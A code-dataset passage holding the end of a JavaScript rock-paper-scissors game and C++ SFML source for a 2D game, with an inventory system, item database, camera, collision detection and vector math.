printResult(`FAIL! You selected ${currentOpt} and computer selected ${currentOpp}`,'fail');
}
}
const clearClasses = () => {
//removing highlights form circle buttons
var selections = document.getElementsByTagName("li");
for (var i = 0; i < selections.length; ++i) {
selections[i].removeAttribute('class');
}
}
const printResult = (str,status) => {
//printing result and adding color class to results div
resultDiv.innerHTML = str;
if(status === 'win') {
resultDiv.classList.remove('fails');
resultDiv.classList.add('wins');
}
else if(status === 'fail') {
resultDiv.classList.remove('wins');
resultDiv.classList.add('fails');
}
else {
resultDiv.classList.remove('fails');
resultDiv.classList.remove('wins');
}
}
const printScore = () => {
document.getElementById('yourwins').innerHTML = wins;
document.getElementById('computerwins').innerHTML = fails;
}
const gameOver = () => {
document.getElementById('options').classList.add('end');
addButton('restart');
}
createSelections();
|
51111721bf6f8709230f9a36297969ca9f336344
|
[
"Markdown",
"JavaScript"
] | 2 |
Markdown
|
gettimer/rockpaperscissors
|
d1b6e3db6593720c52d12ca0847778adad2a7c6a
|
c71cdf17d2ddbf2819862ac6b3770a1f787b32b3
|
refs/heads/master
|
<file_sep>#include "ItemDatabase.h"
#include <fstream>
#include <sstream>
#include <string>
static const char* DB_FILE = "Resources/ItemDatabase/ItemDatabase.txt";
static const char* ITEM_IMAGES_PATH = "Resources/Images/Items/";
ItemDatabase::ItemDatabase() {
std::ifstream infile(DB_FILE);
std::string line, name, desc, imageFilename;
int width, height, maxStack;
int index = 0;
std::istringstream iss;
while (std::getline(infile, line)) {
iss.clear();
iss.str(line);
mItemDatabase[index].ID = index;
iss >> name >> width >> height >> maxStack >> imageFilename;
mItemDatabase[index].name = name;
mItemDatabase[index].width = width;
mItemDatabase[index].height = height;
mItemDatabase[index].maxStack = maxStack;
mItemDatabase[index].imageFilename = ITEM_IMAGES_PATH + imageFilename;
std::getline(iss, desc);
mItemDatabase[index].description = desc;
index++;
}
}
ItemDatabase& ItemDatabase::getInstance() {
static ItemDatabase iDB;
return iDB;
}
ItemDatabase::ItemStruct* ItemDatabase::getItemInfo(int index) {
if (index < DATABASE_SIZE)
return &mItemDatabase[index];
return nullptr;
}
ItemDatabase::ItemStruct* ItemDatabase::getItemInfoByName(const std::string & name)
{
for (int i = 0; i < DATABASE_SIZE; i++)
if (mItemDatabase[i].name == name) {
return &mItemDatabase[i];
}
return nullptr;
}
ItemDatabase::~ItemDatabase() {
}
<file_sep>#ifndef _INCLUDED_MOUSECURSOR_H_
#define _INCLUDED_MOUSECURSOR_H_
#include "CollidableEntityDefault.h"
#include "EventObserver.h"
#include "SFML/Graphics/Sprite.hpp"
#include <SFML/Graphics/Texture.hpp>
namespace sf {
class RenderWindow;
}
class EventManager;
class Inventory;
class MouseCursor :public CollidableEntityDefault, public EventObserver {
public:
MouseCursor();
~MouseCursor();
void initalize(EventManager* eventManager, sf::RenderWindow* window);
void finalize();
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual void collide(CollidableEntity * collidable, const sf::Vector2f & moveAway) override;
virtual void observe(const sf::Event & _event) override;
private:
sf::Sprite mSprite;
sf::Texture mTexture;
sf::RenderWindow* mWindow;
EventManager* mEventManager;
};
#endif // !_INCLUDED_MOUSECURSOR_H_
<file_sep>#include "Camera.h"
#include "Player.h"
#include "Constants.h"
#include <SFML/Graphics/View.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
Camera::Camera(sf::RenderWindow* window) :
Entity(UNUSED),
mWindow(window) {
/*sf::View view;
view.setSize(640, 480);
mWindow->setView(view);*/
}
Camera::~Camera() {
}
bool Camera::setup(Entity* player, sf::Vector2f mapBounds) {
if (player == nullptr)
return false;
mPlayer = player;
mBounds = mapBounds;
return true;
}
void Camera::tick(const sf::Time& deltaTime) {
sf::View view = mWindow->getView();
sf::Vector2f playerPos = mPlayer->getPosition();
view.setCenter(playerPos);
float halfWidth = view.getSize().x / 2.0f;
float halfHeight = view.getSize().y / 2.0f;
// Don't let the camera move out of bounds
if (view.getCenter().x < halfWidth)
view.setCenter(halfWidth, view.getCenter().y);
else if (view.getCenter().x > mBounds.x - halfWidth)
view.setCenter(mBounds.x - halfWidth, view.getCenter().y);
if (view.getCenter().y < halfHeight)
view.setCenter(view.getCenter().x, halfHeight);
else if (view.getCenter().y > mBounds.y - halfHeight)
view.setCenter(view.getCenter().x, mBounds.y - halfHeight);
mWindow->setView(view);
}
void Camera::draw(sf::RenderTarget & target, sf::RenderStates states) const {
}
<file_sep>#include "GameManager.h"
#include "EventManager.h"
#include "GameStatePlaying.h"
#include <SFML/System/Clock.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
static const char* TITLE = "Burrowing Deeper";
GameManager::GameManager() :
mClock(),
mWindow(new sf::RenderWindow()), mEventManager(new EventManager())
{
mGameState = new GameStatePlaying(mWindow, mEventManager);
mEventManager->registerObserver(this, std::vector<sf::Event::EventType>{sf::Event::EventType::Closed, sf::Event::EventType::KeyPressed});
}
GameManager::~GameManager() {
mEventManager->unregisterObserver(this, sf::Event::EventType::Closed);
}
void GameManager::run() {
if (!initalizeGame()) {
printf("Failed to initialize the game.");
exit(-1);
}
gameLoop();
}
void GameManager::observe(const sf::Event & _event) {
switch (_event.type) {
case sf::Event::EventType::Closed:
close();
break;
case sf::Event::EventType::KeyPressed:
if (_event.key.code == sf::Keyboard::Escape) {
close();
}
default:
break;
}
}
bool GameManager::initalizeGame() {
if (!initalizeWindow()) {
printf("Failed to initalize window");
return false;
}
srand((unsigned int)time(NULL));
return true;
}
bool GameManager::initalizeWindow() {
sf::VideoMode video = sf::VideoMode::getDesktopMode();
video.getDesktopMode();
if (!video.isValid())
return false;
mWindow->create(video, TITLE, sf::Style::Fullscreen);
if (!mWindow->isOpen())
return false;
mWindow->setMouseCursorVisible(false);
mWindow->setVerticalSyncEnabled(false);
return true;
}
void GameManager::close() {
mWindow->close();
}
void GameManager::gameLoop() {
mClock.restart();
mGameState->setup();
while (mWindow->isOpen()) {
mGameState->handleEvents();
mGameState->update(mClock);
mWindow->clear();
mGameState->render();
mWindow->display();
}
}
<file_sep>#pragma once
#include <string>
class ItemDatabase {
public:
struct ItemStruct {
std::string name, imageFilename;
int ID, width, height, maxStack;
std::string description;
};
static ItemDatabase& getInstance();
ItemStruct* getItemInfo(int index);
ItemStruct* getItemInfoByName(const std::string& name);
ItemDatabase(const ItemDatabase&) = delete;
ItemDatabase& operator=(const ItemDatabase&) = delete;
~ItemDatabase();
private:
ItemDatabase();
static const int DATABASE_SIZE = 10;
ItemStruct mItemDatabase[DATABASE_SIZE];
};<file_sep>#include "ItemManager.h"
#include "EventManager.h"
#include "MouseCursor.h"
#include "Item.h"
#include "Inventory.h"
#include "InventorySlot.h"
#include "Constants.h"
ItemManager::ItemManager(EventManager* eventManager) :
mEventManager(eventManager) {
mEventManager->registerObserver(this, sf::Event::MouseButtonPressed);
}
ItemManager::~ItemManager() {
mEventManager->unregisterObserver(this, sf::Event::MouseButtonPressed);
}
bool ItemManager::initialize(MouseCursor* cursor, Inventory* inventory) {
if ((mCursor = cursor) != nullptr && (mInventory = inventory) != nullptr)
return false;
return true;
}
void ItemManager::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::MouseButtonPressed: {
// If inventory is closed, do nothing
float x = mCursor->getPosition().x;
float xmin = mInventory->getPosition().x;
float xmax = mInventory->getWidth() + xmin;
float y = mCursor->getPosition().y;
float ymin = mInventory->getPosition().y;
float ymax = mInventory->getHeight() + ymin;
// Check if the cursor is within the inventory's boundaries
// and also active (open)
if (mInventory->getActive() && x > xmin && x < xmax && y > ymin && y < ymax) {
// Then convert coordinates into inventory slot id
float slotWidth = mInventory->getWidth() / (float)mInventory->getFrameNrX();
float slotHeight = mInventory->getHeight() / (float)mInventory->getFrameNrY();
x = x - xmin;
y = y - ymin;
int slotX = (int)(x / slotWidth);
int slotY = (int)(y / slotHeight);
int slot = slotX + mInventory->getFrameNrX()*slotY;
InventorySlot* invSlot = mInventory->getInventorySlot(slot);
Item* invItem = invSlot->getContent();
// If no item is held and invSlot is an item then
// take item from inventory slot and place on cursor
if (mCursorItem == nullptr && invItem != nullptr) {
mCursorItem = mInventory->takeItemFromSlot(slot, mCursor);
}
// If mouse is holding an item then call for swap
else if (mCursorItem != nullptr) {
mCursorItem = mInventory->swapItems(mCursorItem, slot, mCursor);
int i = 0;
}
}
// If the mouse is outside the inventory window and holding an item,
// then drop it into the world
else if (mCursorItem != nullptr) {
// TODO
}
break;
}
default: {
break;
}
}
}
<file_sep>#define _USE_MATH_DEFINES
#include "VectorMath.h"
#include <cmath>
#include <cassert>
float VectorMath::dotProduct(const sf::Vector2f& a, const sf::Vector2f& b) {
return a.x * b.x + a.y * b.y;
}
float VectorMath::getVectorLength(const sf::Vector2f& vector) {
return sqrt(dotProduct(vector, vector));
}
float VectorMath::getVectorLengthSq(const sf::Vector2f& vector) {
return dotProduct(vector, vector);
}
sf::Vector2f VectorMath::projectVector(const sf::Vector2f& aVector, const sf::Vector2f& aProjectOn) {
return (dotProduct(aProjectOn, aVector) / dotProduct(aProjectOn, aProjectOn)) * aProjectOn;
}
sf::Vector2f VectorMath::normalizeVector(const sf::Vector2f& vector) {
if (getVectorLengthSq(vector) == 0) {
return sf::Vector2f(0, 0);
}
if (getVectorLengthSq(vector) == 1) return vector;
float factor = 1.0f / getVectorLength(vector);
return sf::Vector2f(vector.x*factor, vector.y*factor);
}
// Returns the angle between two vectors.
float VectorMath::getAngle(const sf::Vector2f& v1, const sf::Vector2f& v2) {
return std::atan2(v2.y, v2.x) - std::atan2(v1.y, v1.x);
}
sf::Vector2f VectorMath::getNormal(const sf::Vector2f& aVector) {
return sf::Vector2f(-aVector.y, aVector.x);
}
sf::Vector2f VectorMath::rotateVector(const sf::Vector2f& vector, const float& degrees) {
sf::Vector2f newVector;
float degreesFromRadians = degrees*(float)M_PI / 180.0f;
newVector.x = vector.x* std::cosf(degreesFromRadians) + vector.y*-std::sinf(degreesFromRadians);
newVector.y = vector.x*std::sinf(degreesFromRadians) + vector.y*std::cosf(degreesFromRadians);
return newVector;
}<file_sep>#include "Inventory.h"
#include "EventManager.h"
#include "EntityManager.h"
#include "ResourceManager.h"
#include "InventorySlot.h"
#include "Item.h"
#include <SFML/Graphics/Texture.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
#include <SFML/Window/Event.hpp>
static const char* TEXTURE_FRAME = "Resources/Images/InventoryFrame.png";
static const int ITEM_RENDER_LAYER = 110;
Inventory::Inventory(EventManager* eventManager, EntityManager* entityManager) :
Entity(UNUSED),
mEventManager(eventManager),
mEntityManager(entityManager),
mInventorySlots(), mActive(false), mGarbage(false),
mFrameNrY(0), mFrameNrX(0) {
sf::Color col = { sf::Uint8(155), sf::Uint8(155), sf::Uint8(255), sf::Uint8(200) };
mBackground.setFillColor(col);
mBackground.setOutlineThickness(4.0f);
setPosition(150.0f, 50.0f);
mEventManager->registerObserver(this, sf::Event::EventType::KeyPressed);
}
Inventory::~Inventory() {
mEventManager->unregisterObserver(this, sf::Event::EventType::KeyPressed);
mInventorySlots.clear();
}
void Inventory::setupInventory(int width, int height) {
mFrameNrX = width;
mFrameNrY = height;
sf::Texture* tex = &ResourceManager::getInstance().getTexture(TEXTURE_FRAME);
sf::Vector2f vec = { (float)tex->getSize().x, (float)tex->getSize().y };
sf::Color col = { sf::Uint8(255), sf::Uint8(255), sf::Uint8(255), sf::Uint8(200) };
for (int i = 0; i < mFrameNrY; i++) {
for (int j = 0; j < mFrameNrX; j++) {
sf::Vector2f vec2((float)tex->getSize().x*(float)j,
(float)tex->getSize().y*(float)i);
InventorySlot slot = InventorySlot(j + i*mFrameNrX);
slot.setTexture(TEXTURE_FRAME);
slot.setPosition(vec2 + getPosition());
mInventorySlots.push_back(slot);
}
}
mWidth = vec.x*(float)width;
mHeight = vec.y*(float)height;
sf::Vector2f vec2 = { mWidth, mHeight };
mBackground.setSize(vec2);
}
int Inventory::getFrameNrX() const {
return mFrameNrX;
}
int Inventory::getFrameNrY() const {
return mFrameNrY;
}
float Inventory::getWidth() const {
return mWidth;
}
float Inventory::getHeight() const {
return mHeight;
}
bool Inventory::getActive() const {
return mActive;
}
// Iterate through the entire inventory to try and find an empty space for the item
void Inventory::addItem(Item* item, size_t startpoint) {
for (size_t i = startpoint; i < mInventorySlots.size(); i++) {
if (item == nullptr) return;
item = addItemToSlot(item, i);
}
// There was no room for the item, throw it out into the world or some shit
// TODO
}
// Function for adding a item to a specific slot in the inventory
Item* Inventory::addItemToSlot(Item* item, int slot) {
// If slot is out of bounds or there is no item then return immediately
if (slot > mFrameNrX * mFrameNrY || slot < 0 ||
item == nullptr) return item;
Item* invItem = mInventorySlots[slot].getContent();
int newSlot = getNewSlot(slot, item->getItemInfo()->width, item->getItemInfo()->height);
std::vector<int> indices(getArea(item, newSlot));
bool empty = true;
indices = getArea(item, newSlot);
// If there is an item in any of the slots, return
for (size_t i = 0; i < indices.size(); i++) {
Item* itemToCheck = mInventorySlots[indices.at(i)].getContent();
if (itemToCheck != nullptr) {
return item;
}
}
// If there indeed was an empty space then add the item there
if (empty) {
item->anchorToEntity(&mInventorySlots[newSlot]);
item->setRenderLayer(110);
for (size_t i = 0; i < indices.size(); i++)
mInventorySlots[indices[i]].setContent(item);
if (item->getItemInfo()->maxStack < item->getStackSize()) {
int newStackSize = item->getStackSize() - item->getItemInfo()->maxStack;
Item* newItem = new Item(item->getItemInfo()->ID, newStackSize);
item->setMaxStack();
mEntityManager->addEntity(newItem);
newItem->setRenderLayer(110);
return newItem;
}
return nullptr;
}
// If the inventory item has the same ID and is at less than
// max stacks then merge the items
else if (invItem->getItemInfo()->ID == item->getItemInfo()->ID &&
invItem->getItemInfo()->maxStack < invItem->getStackSize()) {
// If there are more stacks in total than the max stack, create a new
// instance
if (invItem->getStackSize() + item->getStackSize() > invItem->getItemInfo()->maxStack) {
int newSize = invItem->getStackSize() + item->getStackSize() - invItem->getItemInfo()->maxStack;
invItem->setMaxStack();
Item* newItem = new Item(item->getItemInfo()->ID, newSize);
newItem->setRenderLayer(110);
mEntityManager->addEntity(newItem);
return item;
}
invItem->addToStack(item->getStackSize());
item->garbage();
return nullptr;
}
return item;
}
// Takes whatever item from the requested slot if any and hand over responsibility
Item* Inventory::takeItemFromSlot(int slot, Entity* anchor) {
Item* invItem = mInventorySlots[slot].getContent();
if (slot < 0 || invItem == nullptr || anchor == nullptr) return nullptr;
int newSlot = getNewSlot(invItem->getInventorySlot(), invItem->getItemInfo()->width, invItem->getItemInfo()->height);
invItem->anchorToEntity(anchor);
invItem->setRenderLayer(110);
std::vector<int> indices = getArea(invItem, newSlot);
for (size_t i = 0; i < indices.size(); i++) {
mInventorySlots[indices[i]].setContent(nullptr);
}
return invItem;
}
Item* Inventory::swapItems(Item* item, int slot, Entity* anchor) {
if (slot > mFrameNrX * mFrameNrY || slot < 0
|| item == nullptr) return item;
Item* invItem = nullptr;
int newSlot = getNewSlot(slot, item->getItemInfo()->width, item->getItemInfo()->height);
std::vector<int> indices(getArea(item, newSlot));
bool empty = true;
Item* itemToCheck = mInventorySlots[slot].getContent();
// Check to see if the requested slots have only a single item in them, or are empty
for (size_t i = 0; i < indices.size(); i++) {
invItem = mInventorySlots[indices[i]].getContent();
if (itemToCheck == nullptr && invItem != nullptr)
itemToCheck = invItem;
if (invItem != nullptr && itemToCheck != invItem && itemToCheck != nullptr) {
return item;
}
}
// If all slots were empty, no need to swap
if (itemToCheck == nullptr) {
item->anchorToEntity(&mInventorySlots[newSlot]);
item->setRenderLayer(110);
for (size_t i = 0; i < indices.size(); i++)
mInventorySlots[indices[i]].setContent(item);
if (item->getItemInfo()->maxStack < item->getStackSize()) {
int newSize = item->getStackSize() - item->getItemInfo()->maxStack;
Item* newItem = new Item(item->getItemInfo()->ID, newSize);
item->setMaxStack();
mEntityManager->addEntity(newItem);
newItem->setRenderLayer(110);
return newItem;
}
return nullptr;
}
// If the inventory item has the same ID and is at less than
// max stacks then merge the items
else if (itemToCheck->getItemInfo()->ID == item->getItemInfo()->ID &&
itemToCheck->getItemInfo()->maxStack > itemToCheck->getStackSize()) {
// If there are more stacks in total than the max stack, create a new
// instance
if (itemToCheck->getStackSize() + item->getStackSize() > itemToCheck->getItemInfo()->maxStack) {
int newSize = itemToCheck->getStackSize() - itemToCheck->getItemInfo()->maxStack;
itemToCheck->setMaxStack();
item->addToStack(newSize);
return item;
}
itemToCheck->addToStack(item->getStackSize());
item->garbage();
return nullptr;
}
// If not, proceed with swap
else {
int newSlot2 = getNewSlot(itemToCheck->getInventorySlot(), itemToCheck->getItemInfo()->width, itemToCheck->getItemInfo()->height);
std::vector<int> indices2 = getArea(itemToCheck, newSlot2);
// Deassociate all slots from the item being swapped out and attach to anchor
for (size_t i = 0; i < indices2.size(); i++) {
mInventorySlots[indices2[i]].setContent(nullptr);
}
itemToCheck->anchorToEntity(anchor);
// And then associate all the slots of the new item and anchor it
item->anchorToEntity(&mInventorySlots[newSlot]);
for (size_t i = 0; i < indices.size(); i++) {
mInventorySlots[indices[i]].setContent(item);
}
return itemToCheck;
}
return item;
}
InventorySlot* Inventory::getInventorySlot(int index) {
return &mInventorySlots[index];
}
void Inventory::tick(const sf::Time& deltaTime) {
if (!mActive) return;
}
void Inventory::draw(sf::RenderTarget& target, sf::RenderStates states) const {
if (!mActive) return;
sf::RenderStates states1(states);
states1.transform *= getTransform();
target.draw(mBackground, states1);
for (auto i : mInventorySlots) {
target.draw(i, states);
}
}
bool Inventory::garbage() const {
return mGarbage;
}
void Inventory::kill() {
mGarbage = true;
}
void Inventory::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::EventType::KeyPressed:
if (_event.key.code == sf::Keyboard::I) {
mActive = !mActive;
for (size_t i = 0; i < mInventorySlots.size(); i++) {
if (mInventorySlots[i].getContent() != nullptr)
if (mActive)
mInventorySlots[i].getContent()->setDrawMe(true);
else
mInventorySlots[i].getContent()->setDrawMe(false);
}
}
default:
break;
}
}
// Returns a vector with all the indices of slots in the inventory a item occupies
std::vector<int> Inventory::getArea(Item* item, int slot) {
int width = item->getItemInfo()->width,
height = item->getItemInfo()->height;
std::vector<int> indices;
for (int i = 0; i < width; i++) {
for (int j = 0; j < height; j++) {
indices.push_back(slot + i + j*mFrameNrX);
}
}
return indices;
}
// Corrects a slot to be within the the inventorys bounds based on the items size
int Inventory::getNewSlot(int slot, int width, int height) {
if (slot % mFrameNrX + width > mFrameNrX) {
int distanceFromEdge = mFrameNrX - (slot % mFrameNrX);
slot = slot - (width - distanceFromEdge);
}
if (slot / mFrameNrX + height > mFrameNrY) {
int distanceFromEdge = mFrameNrY - (slot / mFrameNrX);
slot = slot - (width - distanceFromEdge)*mFrameNrX;
}
return slot;
}<file_sep>#ifndef _INCLUDED_CAMERA_H_
#define _INCLUDED_CAMERA_H_
#include "Entity.h"
namespace sf {
class RenderWindow;
}
class Camera : public Entity {
public:
Camera(sf::RenderWindow* window);
~Camera();
bool setup(Entity* player, sf::Vector2f mapBounds);
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override { return false; };
virtual void kill() override {};
private:
Entity* mPlayer;
sf::RenderWindow* mWindow;
sf::Vector2f mBounds;
};
#endif // !_INCLUDED_CAMERA_H_
<file_sep>#pragma once
#include <SFML/System/Vector2.hpp>
namespace Constants {
namespace Block {
static const int Height = 32;
static const int Width = 32;
}
namespace Map {
static const int Width = 512;
static const int Height = 128;
}
namespace Physics {
static const float Gravity = 5.0f;
static const float ImpactBounce = 0.33f;
static const sf::Vector2f TerminalVelocity = { 3.0f, 4.0f };
}
namespace Files {
static const char* Default_Font = "Resources/Fonts/Candara.ttf";
}
}<file_sep>#include "CollidableEntity.h"
CollidableEntity::CollidableEntity(EntityType entityType) :
Entity(entityType) {
}
CollidableEntity::~CollidableEntity() {
}
<file_sep>#include "InventorySlot.h"
#include "ResourceManager.h"
#include <SFML/Graphics/RenderWindow.hpp>
InventorySlot::InventorySlot(int index) :
Entity(INVENTORYSLOT),
mIndex(index),
mGarbage(false) {
setRenderLayer(110);
}
InventorySlot::~InventorySlot() {
}
void InventorySlot::setTexture(const char* filename) {
mBackground.setTexture(ResourceManager::getInstance().getTexture(filename));
}
Item* InventorySlot::getContent() {
return mContent;
}
void InventorySlot::setContent(Item* item) {
mContent = item;
}
void InventorySlot::setIndex(int index) {
mIndex;
}
int InventorySlot::getIndex() const {
return mIndex;
}
void InventorySlot::tick(const sf::Time& deltaTime) {
}
void InventorySlot::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mBackground, states);
}
bool InventorySlot::garbage() const {
return mGarbage;
}
void InventorySlot::kill() {
mGarbage = true;
}
<file_sep>#pragma once
#include "Entity.h"
#include "EventObserver.h"
#include <SFML/Graphics/Sprite.hpp>
#include <SFML/Graphics/Texture.hpp>
#include <SFML/Graphics/RectangleShape.hpp>
#include <vector>
class EventManager;
class EntityManager;
class InventorySlot;
class Item;
class Inventory : public Entity, public EventObserver {
public:
Inventory(EventManager* eventManager, EntityManager* entityManager);
~Inventory();
void setupInventory(int width, int height);
int getFrameNrX() const;
int getFrameNrY() const;
float getWidth() const;
float getHeight() const;
bool getActive() const;
void addItem(Item* item, size_t startpoint = 0);
Item* addItemToSlot(Item* item, int slot);
Item* takeItemFromSlot(int slot, Entity* anchor);
Item* swapItems(Item* item, int slot, Entity* anchor);
InventorySlot* getInventorySlot(int index);
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual bool garbage() const override;
virtual void kill() override;
virtual void observe(const sf::Event & _event) override;
private:
std::vector<int> getArea(Item* item, int slot);
int getNewSlot(int slot, int width, int height);
std::vector<InventorySlot> mInventorySlots;
sf::RectangleShape mBackground;
EventManager* mEventManager;
EntityManager* mEntityManager;
int mRenderLayer;
int mFrameNrX, mFrameNrY;
float mWidth, mHeight;
bool mGarbage;
bool mActive;
};<file_sep>#include "MouseCursor.h"
#include <SFML/Graphics/RenderTarget.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
#include "EventManager.h"
#include "Inventory.h"
static const char* TEXTURE = "Resources/Images/MousePointer.png";
MouseCursor::MouseCursor() :
CollidableEntityDefault(EntityType::UNUSED),
mTexture(), mSprite() {
mCat = CollideCategory::CURSOR;
mTexture.loadFromFile(TEXTURE);
mSprite.setTexture(mTexture);
mHitboxShape->setTextureRect(sf::IntRect(-4, -4, 8, 8));
}
MouseCursor::~MouseCursor() {
}
void MouseCursor::initalize(EventManager* eventManager, sf::RenderWindow* window) {
mEventManager = eventManager;
mWindow = window;
mEventManager->registerObserver(this, sf::Event::MouseMoved);
}
void MouseCursor::finalize() {
mEventManager->unregisterObserver(this, sf::Event::MouseMoved);
}
void MouseCursor::tick(const sf::Time& deltaTime) {
}
void MouseCursor::draw(sf::RenderTarget& target, sf::RenderStates states) const {
states.transform *= getTransform();
target.draw(mSprite, states);
}
void MouseCursor::collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) {
}
void MouseCursor::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::MouseMoved:
setPosition((float)_event.mouseMove.x, (float)_event.mouseMove.y);
break;
}
}
<file_sep>#include "CollisionManager.h"
#include "TileMap.h"
#include "Item.h"
#include "VectorMath.h"
#include "Constants.h"
#include <SFML/Graphics/Shape.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
#include <stack>
static const int COLLISION_RADIUS = 200;
CollisionManager::CollisionManager(sf::RenderWindow* window) :
mWindow(window) {
}
CollisionManager::~CollisionManager() {
clearVector();
}
void CollisionManager::addDynamicCollidable(CollidableEntity* collidable) {
mDynamicCollidables.push_back(collidable);
}
void CollisionManager::addTileMap(TileMap* tileMap) {
mTileMap = tileMap;
}
const CollisionManager::CollidableVector& CollisionManager::getDynamicCollidables() const {
return mDynamicCollidables;
}
//TileMap& CollisionManager::getTileMap(){
// return mTileMap;
//}
std::pair<float, float> getProjection(const sf::Shape& shape, sf::Vector2f& axis) {
sf::Transform trans = shape.getTransform();
float minVal = VectorMath::dotProduct(axis, VectorMath::projectVector(trans.transformPoint(shape.getPoint(0)), axis));
float maxVal = minVal;
for (std::size_t i = 1; i < shape.getPointCount(); i++) {
float temp = VectorMath::dotProduct(axis, VectorMath::projectVector(trans.transformPoint(shape.getPoint(i)), axis));
if (temp < minVal)
minVal = temp;
else if (temp > maxVal)
maxVal = temp;
}
return std::make_pair(minVal, maxVal);
}
void CollisionManager::detectCollisions() {
sf::FloatRect bounds(mWindow->mapPixelToCoords({ 0, 0 }),
mWindow->getView().getSize());
bounds.left -= 50.0f;
bounds.top -= 50.0f;
bounds.height += 100.0f;
bounds.width += 100.0f;
//Culls collision to only account for active against static so that
//things like walls arent checked against eachother
std::stack<std::pair<CollidableEntity*, CollidableEntity*>> colliding;
CollidableVector staticCollidables;
for (std::size_t i = 0; i < mDynamicCollidables.size(); i++) {
CollidableEntity* collidable0 = mDynamicCollidables[i];
for (std::size_t j = i + 1; j < mDynamicCollidables.size(); j++) {
CollidableEntity *collidable1 = mDynamicCollidables[j];
if (collidable0->getHitbox().intersects(collidable1->getHitbox()) && (collidable0->getCategory() != collidable1->getCategory())) {
colliding.push(std::make_pair(collidable0, collidable1));
}
}
int position = (int)collidable0->getPosition().x / Constants::Block::Width +
((int)collidable0->getPosition().y / Constants::Block::Height) * Constants::Map::Width;
//Get a square grid of 5x5 around the position wrapped around the map size to avoid out of bounds
for (int j = -2; j < 3; j++) {
for (int k = -2; k < 3; k++) {
int absPos = abs(position + j + k*Constants::Map::Width)
% (Constants::Map::Height*Constants::Map::Width);
CollidableEntity* entity = mTileMap->getWallHashTable()[absPos];
if (entity != nullptr)
staticCollidables.push_back(entity);
}
}
// Check dynamic entities against items
for (std::size_t j = 0; j < mItems.size(); j++) {
CollidableEntity* collidable1 = mItems[j];
Item* item;
item = dynamic_cast<Item*>(collidable1);
if (item->getAnchor() == nullptr &&
(collidable0->getHitbox().intersects(collidable1->getHitbox()) &&
(collidable0->getCategory() != collidable1->getCategory()))) {
colliding.push(std::make_pair(collidable0, collidable1));
}
}
// Check Dynamic entities against static entities
for (std::size_t j = 0; j < staticCollidables.size(); j++) {
CollidableEntity *collidable1 = staticCollidables[j];
if (collidable0->getHitbox().intersects(collidable1->getHitbox()) && (collidable0->getCategory() != collidable1->getCategory())) {
colliding.push(std::make_pair(collidable0, collidable1));
}
}
staticCollidables.clear();
}
while (!colliding.empty()) {
narrowCollision(colliding.top());
colliding.pop();
}
}
void CollisionManager::removeDeadCollidables() {
CollidableVector vec;
for (auto c : mDynamicCollidables) {
if (!c->garbage())
vec.push_back(c);
}
mDynamicCollidables = vec;
vec.clear();
}
void CollisionManager::clearVector() {
mDynamicCollidables.clear();
}
void CollisionManager::narrowCollision(std::pair<CollidableEntity*, CollidableEntity*>& colliding) {
bool isColliding = true;
auto hitboxPair = std::make_pair(colliding.first->getNarrowHitbox(), colliding.second->getNarrowHitbox());
sf::Vector2f smallest(0, 0);
float overlap = 5000;
std::vector<sf::Vector2f> axes1 = colliding.first->getAxes();
std::vector<sf::Vector2f> axes2 = colliding.second->getAxes();
std::size_t pointCount = axes1.size();
for (std::size_t i = 0; i < pointCount; i++) {
std::pair<float, float> shapeProj[2];
shapeProj[0] = getProjection(*hitboxPair.first, axes1[i]);
shapeProj[1] = getProjection(*hitboxPair.second, axes1[i]);
if (shapeProj[0].first > shapeProj[1].second || shapeProj[1].first > shapeProj[0].second)
return;
else {
if (shapeProj[0].first < shapeProj[1].second && shapeProj[0].first > shapeProj[1].first) {
float o = shapeProj[1].second - shapeProj[0].first;
if (o < overlap) {
overlap = o;
smallest = axes1[i];
}
}
else if (shapeProj[0].second > shapeProj[1].first && shapeProj[0].second < shapeProj[1].second) {
float o = shapeProj[0].second - shapeProj[1].first;
if (o < overlap) {
overlap = o;
smallest = -axes1[i];
}
}
}
}
pointCount = axes2.size();
for (std::size_t i = 0; i < pointCount; i++) {
std::pair<float, float> shapeProj[2];
shapeProj[0] = getProjection(*hitboxPair.first, axes2[i]);
shapeProj[1] = getProjection(*hitboxPair.second, axes2[i]);
if (shapeProj[0].first >= shapeProj[1].second || shapeProj[1].first >= shapeProj[0].second)
return;
else {
if (shapeProj[0].first <= shapeProj[1].second && shapeProj[0].first >= shapeProj[1].first) {
float o = shapeProj[1].second - shapeProj[0].first;
if (o < overlap) {
overlap = o;
smallest = axes2[i];
}
}
else if (shapeProj[0].second > shapeProj[1].first && shapeProj[0].second < shapeProj[1].second) {
float o = shapeProj[0].second - shapeProj[1].first;
if (o < overlap) {
overlap = o;
smallest = -axes2[i];
}
}
}
}
colliding.first->collide(colliding.second, smallest * overlap);
colliding.second->collide(colliding.first, -smallest * overlap);
}<file_sep>#pragma once
#include "Entity.h"
class Equipment : public Entity {
public:
private:
};<file_sep>#ifndef _INCLUDED_GAMESTATE_H_
#define _INCLUDED_GAMESTATE_H_
#include "EventObserver.h"
#include <SFML/System/Clock.hpp>
class GameState : public EventObserver {
public:
virtual void setup() = 0;
virtual void update(sf::Clock& clock) = 0;
virtual void render() = 0;
virtual void observe(const sf::Event& _event) = 0;
virtual void handleEvents() = 0;
};
#endif // !_INCLUDED_GAMESTATE_H_
<file_sep>#ifndef _INCLUDED_EVENTOBSERVER_H_
#define _INCLUDED_EVENTOBSERVER_H_
namespace sf {
class Event;
}
class EventObserver {
public:
virtual void observe(const sf::Event& _event) = 0;
};
#endif // !_INCLUDED_EVENTOBSERVER_H_
<file_sep>#ifndef _INCLUDED_GAMESTATEPLAYING_H_
#define _INCLUDED_GAMESTATEPLAYING_H_
#include "GameState.h"
#include <vector>
